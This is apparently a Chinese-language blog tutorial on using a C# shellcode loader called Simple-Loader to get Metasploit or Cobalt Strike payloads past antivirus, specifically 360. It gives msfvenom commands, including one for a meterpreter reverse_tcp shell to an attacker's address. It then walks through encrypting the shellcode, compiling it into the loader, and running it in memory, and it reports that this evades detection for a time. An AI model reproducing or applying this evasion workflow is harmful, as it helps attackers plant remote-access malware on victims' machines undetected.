使用Simple-Loader绕过杀软

环境:

Language: C# .NET Framework 4.0 Visual Studio 2019 (community) Build Architecture: x64 Shell Code: MSFVenom windows/exec x32 或者 Cobal Strike x32

生成Payload

calc测试payload

msfvenom -a x86 -p windows/exec cmd=calc.exe -f csharp

或者

msf远控payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f csharp > payload.txt

再或者

CS生成C#版本Payload

编译Simple-Loader

打开Github下载下来的项目后,编译

编译Simple-Loader

运行Simple-Loader

Simple-Loader.exe <path_to_metasploit_payload_txt>

Snipaste_20191223_122622.png

可以看到,软件返回了一个密文结果。

复制该密文结果到Simple-Loader的源码中。

替换Shellcode加密后的内容

然后重新编译。生成新的Simple-Loader.exe

测试效果

将重新生成好的Simple-Loader.exe直接运行即可

360动态杀毒可以过

过360动态防御

但是,过一段时间,360上传分析后,就被杀了。这样的方式只能过一段时间。但是已经很不错了。

被杀

原理理解

其实看代码差不多就能理解,也是Bypass的基本操作,利用类似AES加密这样的操作,将Payload进行加密后,再进行解密,并且直接在内存中运行。

参考

Simple-Loader

bypass-windows-defender-with-a-simple-shell-loader

评论

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×